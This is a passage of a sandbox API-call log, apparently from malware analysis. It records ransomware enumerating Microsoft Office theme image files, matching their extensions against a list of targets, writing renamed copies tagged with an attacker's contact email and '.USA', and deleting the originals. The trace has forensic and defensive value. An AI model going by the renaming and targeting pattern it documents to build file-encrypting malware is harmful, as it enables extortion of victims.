[0045.243] lstrlenW (lpString=".xls") returned 4 [0045.243] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".xlsx") returned 5 [0045.243] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.243] lstrlenW (lpString=".ppt") returned 4 [0045.243] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".zip") returned 4 [0045.243] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".rar") returned 4 [0045.243] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.243] lstrlenW (lpString=".bz2") returned 4 [0045.243] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString=".7z") returned 3 [0045.243] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".dbf") returned 4 [0045.243] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.243] lstrlenW (lpString=".1cd") returned 4 [0045.243] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0045.244] lstrlenW (lpString=".jpg") returned 4 [0045.244] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.244] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.244] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.244] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=945) returned 1 [0045.244] CloseHandle (hObject=0x20c) returned 1 [0045.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 0x20 [0045.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.244] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.244] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.268] GetLastError () returned 0x0 [0045.268] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x3b1, lpOverlapped=0x0) returned 1 [0045.270] WriteFile (in: hFile=0x174, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x3c0, lpOverlapped=0x0) returned 1 [0045.271] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.271] WriteFile (in: hFile=0x174, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.271] SetEndOfFile (hFile=0x174) returned 1 [0045.272] CloseHandle (hObject=0x174) returned 1 [0045.272] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.272] SetEndOfFile (hFile=0x20c) returned 1 [0045.272] CloseHandle (hObject=0x20c) returned 1 [0045.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.273] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 1 [0045.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.273] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.273] lstrlenW (lpString=".doc") returned 4 [0045.273] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.273] lstrlenW (lpString=".docx") returned 5 [0045.273] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.273] lstrlenW (lpString=".pdf") returned 4 [0045.273] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.273] lstrlenW (lpString=".xls") returned 4 [0045.273] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.273] lstrlenW (lpString=".xlsx") returned 5 [0045.273] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.274] lstrlenW (lpString=".ppt") returned 4 [0045.274] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.274] lstrlenW (lpString=".zip") returned 4 [0045.274] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.274] lstrlenW (lpString=".rar") returned 4 [0045.274] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.274] lstrlenW (lpString=".bz2") returned 4 [0045.274] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.274] lstrlenW (lpString=".7z") returned 3 [0045.274] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.274] lstrlenW (lpString=".dbf") returned 4 [0045.274] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.274] lstrlenW (lpString=".1cd") returned 4 [0045.274] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.274] lstrlenW (lpString=".jpg") returned 4 [0045.274] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.274] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.274] lstrlenW (lpString=".doc") returned 4 [0045.274] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.274] lstrlenW (lpString=".docx") returned 5 [0045.274] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.274] lstrlenW (lpString=".pdf") returned 4 [0045.274] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.274] lstrlenW (lpString=".xls") returned 4 [0045.274] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.274] lstrlenW (lpString=".xlsx") returned 5 [0045.274] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.274] lstrlenW (lpString=".ppt") returned 4 [0045.274] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.275] lstrlenW (lpString=".zip") returned 4 [0045.275] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.275] lstrlenW (lpString=".rar") returned 4 [0045.275] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.275] lstrlenW (lpString=".bz2") returned 4 [0045.275] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.275] lstrlenW (lpString=".7z") returned 3 [0045.275] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.275] lstrlenW (lpString=".dbf") returned 4 [0045.275] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.275] lstrlenW (lpString=".1cd") returned 4 [0045.275] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.275] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0045.275] lstrlenW (lpString=".jpg") returned 4 [0045.275] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.275] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.275] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.275] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1363) returned 1 [0045.276] CloseHandle (hObject=0x20c) returned 1 [0045.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 0x20 [0045.276] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.276] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.276] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.278] GetLastError () returned 0x0 [0045.278] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x553, lpOverlapped=0x0) returned 1 [0045.279] WriteFile (in: hFile=0x210, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x560, lpOverlapped=0x0) returned 1 [0045.280] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.280] WriteFile (in: hFile=0x210, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.280] SetEndOfFile (hFile=0x210) returned 1 [0045.280] CloseHandle (hObject=0x210) returned 1 [0045.280] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.280] SetEndOfFile (hFile=0x20c) returned 1 [0045.281] CloseHandle (hObject=0x20c) returned 1 [0045.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.281] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 1 [0045.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.281] lstrlenW (lpString=".doc") returned 4 [0045.281] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.282] lstrlenW (lpString=".docx") returned 5 [0045.282] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.282] lstrlenW (lpString=".pdf") returned 4 [0045.282] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.282] lstrlenW (lpString=".xls") returned 4 [0045.282] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.282] lstrlenW (lpString=".xlsx") returned 5 [0045.282] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.282] lstrlenW (lpString=".ppt") returned 4 [0045.282] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.282] lstrlenW (lpString=".zip") returned 4 [0045.282] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.282] lstrlenW (lpString=".rar") returned 4 [0045.282] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.282] lstrlenW (lpString=".bz2") returned 4 [0045.282] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.282] lstrlenW (lpString=".7z") returned 3 [0045.282] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.282] lstrlenW (lpString=".dbf") returned 4 [0045.282] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.282] lstrlenW (lpString=".1cd") returned 4 [0045.282] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.282] lstrlenW (lpString=".jpg") returned 4 [0045.282] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.282] lstrlenW (lpString=".doc") returned 4 [0045.282] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.282] lstrlenW (lpString=".docx") returned 5 [0045.282] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.282] lstrlenW (lpString=".pdf") returned 4 [0045.283] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.283] lstrlenW (lpString=".xls") returned 4 [0045.283] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.283] lstrlenW (lpString=".xlsx") returned 5 [0045.283] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.283] lstrlenW (lpString=".ppt") returned 4 [0045.283] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.283] lstrlenW (lpString=".zip") returned 4 [0045.283] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.283] lstrlenW (lpString=".rar") returned 4 [0045.283] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.283] lstrlenW (lpString=".bz2") returned 4 [0045.283] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.283] lstrlenW (lpString=".7z") returned 3 [0045.283] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.283] lstrlenW (lpString=".dbf") returned 4 [0045.283] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.283] lstrlenW (lpString=".1cd") returned 4 [0045.283] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0045.283] lstrlenW (lpString=".jpg") returned 4 [0045.283] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.283] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.283] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.284] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=20371) returned 1 [0045.284] CloseHandle (hObject=0x20c) returned 1 [0045.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 0x20 [0045.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.284] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.284] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.284] GetLastError () returned 0x0 [0045.284] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x4f93, lpOverlapped=0x0) returned 1 [0045.286] WriteFile (in: hFile=0x210, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x4fa0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x4fa0, lpOverlapped=0x0) returned 1 [0045.287] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.287] WriteFile (in: hFile=0x210, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.287] SetEndOfFile (hFile=0x210) returned 1 [0045.288] CloseHandle (hObject=0x210) returned 1 [0045.288] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.288] SetEndOfFile (hFile=0x20c) returned 1 [0045.288] CloseHandle (hObject=0x20c) returned 1 [0045.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.289] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\thmbnail.png")) returned 1 [0045.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.289] lstrlenW (lpString=".doc") returned 4 [0045.289] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.289] lstrlenW (lpString=".docx") returned 5 [0045.289] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.289] lstrlenW (lpString=".pdf") returned 4 [0045.289] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.289] lstrlenW (lpString=".xls") returned 4 [0045.289] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.289] lstrlenW (lpString=".xlsx") returned 5 [0045.289] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.289] lstrlenW (lpString=".ppt") returned 4 [0045.289] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.289] lstrlenW (lpString=".zip") returned 4 [0045.290] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.290] lstrlenW (lpString=".rar") returned 4 [0045.290] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.290] lstrlenW (lpString=".bz2") returned 4 [0045.290] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.290] lstrlenW (lpString=".7z") returned 3 [0045.290] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.290] lstrlenW (lpString=".dbf") returned 4 [0045.290] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.290] lstrlenW (lpString=".1cd") returned 4 [0045.290] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.290] lstrlenW (lpString=".jpg") returned 4 [0045.290] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\THMBNAIL.PNG") returned 76 [0045.290] lstrlenW (lpString=".doc") returned 4 [0045.290] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.290] lstrlenW (lpString=".docx") returned 5 [0045.290] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.290] lstrlenW (lpString=".pdf") returned 4 [0045.290] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.290] lstrlenW 